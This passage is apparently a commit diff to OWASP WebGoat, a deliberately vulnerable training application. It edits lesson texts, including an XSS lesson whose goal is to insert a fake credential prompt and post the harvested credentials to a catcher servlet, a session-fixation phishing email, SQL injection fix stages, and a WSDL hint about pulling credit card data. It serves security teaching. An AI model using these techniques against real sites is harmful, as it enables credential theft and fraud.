+ "Using XSS and HTML insertion, your goal is to: <UL>"
+ "<LI>Insert html to that requests credentials"
+ "<LI>Add javascript to actually collect the credentials"
+ "<LI>Post the credentials to http://localhost/WebGoat/catcher?PROPERTY=yes...</UL> "
+ "<LI>Post the credentials to http://localhost/webgoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions);

3
src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
View File

@ -62,8 +62,9 @@ public class DeleteProfile extends DefaultLessonAction
if (isAuthenticated(s))
{
if (userId != employeeId) {
deleteEmployeeProfile(s, userId, employeeId);
}
try
{
chainedAction.handleRequest(s);

2
src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
View File

@ -68,6 +68,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
// This action has not yet been implemented. None of the lessons require it.
registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
// These actions are special in that they chain to other actions.

6
src/main/java/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
View File

@ -149,7 +149,8 @@ public class SQLInjection extends GoatHillsFinancial
}
else if (STAGE2.equals(stage))
{
instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br>"
instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br><br>"
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br><br>"
+ "Implement a fix to block SQL injection into the fields in question on the Login page. "
+ "Repeat stage 1. Verify that the attack is no longer effective.";
}
@ -161,7 +162,8 @@ public class SQLInjection extends GoatHillsFinancial
}
else if (STAGE4.equals(stage))
{
instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br>"
instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br><br>"
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br><br>"
+ "Implement a fix to block SQL injection into the relevant parameter. "
+ "Repeat stage 3. Verify that access to Neville's profile is properly blocked.";
}

2
src/main/java/org/owasp/webgoat/lessons/SessionFixation.java
View File

@ -245,7 +245,7 @@ public class SessionFixation extends SequentialLessonAdapter
+ "During the last week we had a few problems with our database. "
+ "We have received many complaints regarding incorrect account details. "
+ "Please use the following link to verify your account "
+ "data:<br><br><center><a href=/WebGoat/"
+ "data:<br><br><center><a href=/webgoat/"
+ link
+ "> Goat Hills Financial</a></center><br><br>"
+ "We are sorry for the any inconvenience and thank you for your cooparation.<br><br>"

2
src/main/java/org/owasp/webgoat/lessons/SqlStringInjection.java
View File

@ -141,7 +141,7 @@ public class SqlStringInjection extends SequentialLessonAdapter
{
ElementContainer ec = new ElementContainer();
ec.addElement(WebGoatI18N.get("StringSqlInjectioNSecondStage"));
ec.addElement(WebGoatI18N.get("StringSqlInjectionSecondStage"));
if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals("restart"))
{
getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");

2
src/main/java/org/owasp/webgoat/lessons/WSDLScanning.java
View File

@ -118,7 +118,7 @@ public class WSDLScanning extends LessonAdapter
hints.add("Try connecting to the WSDL with a browser or Web Service tool.");
hints.add("Sometimes the WSDL will define methods that are not available through a web API. "
+ "Try to find operations that are in the WSDL, but not part of this API");
hints.add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning <br>"
hints.add("The URL for the web service is: http://localhost/webgoat/services/WSDLScanning <br>"
+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
hints.add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request.");
return hints;